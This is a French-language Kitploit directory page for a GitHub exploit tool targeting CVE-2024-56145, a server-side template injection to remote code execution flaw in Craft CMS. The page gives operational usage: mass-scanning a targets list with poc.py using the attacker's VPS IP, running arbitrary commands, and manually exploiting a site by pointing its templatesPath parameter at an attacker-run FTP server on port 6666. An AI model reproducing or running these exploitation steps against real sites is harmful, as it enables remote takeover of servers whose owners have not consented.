Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI vers RCE - templates Twig | Kitploit
Outils/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI vers RCE - templates Twig

Voir le dépôt
43il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Avant de relancer le script, faites

fuser -k 6666/tcp

Utilisation -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Une commande personnalisée peut être utilisée comme python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i est votre IP ou l'IP de votre VPS (utilisez celle-ci en faisant ipconfig / ifconfig.

Exemple - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Exploitation manuelle, exécutez le poc.py ci-dessus sur les cibles que vous avez, vous verrez un fichier de sortie avec les cibles vulnérables

Et maintenant ? Vous avez une cible vulnérable mais vous voulez aller plus loin ? J'ai donc ajouté poc2.py pour un test manuel contre la cible. Comment faire ? faites fuser -k 6666/tcp

root@kitploit:~
1. Exécutez poc2.py (le port 6666 est démarré en tant que FTP).
2. Ouvrez le navigateur yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. vous verrez -

image

Écrit par Chirag Artani (https://x.com/Chirag99Artani)

Télécharger l’outil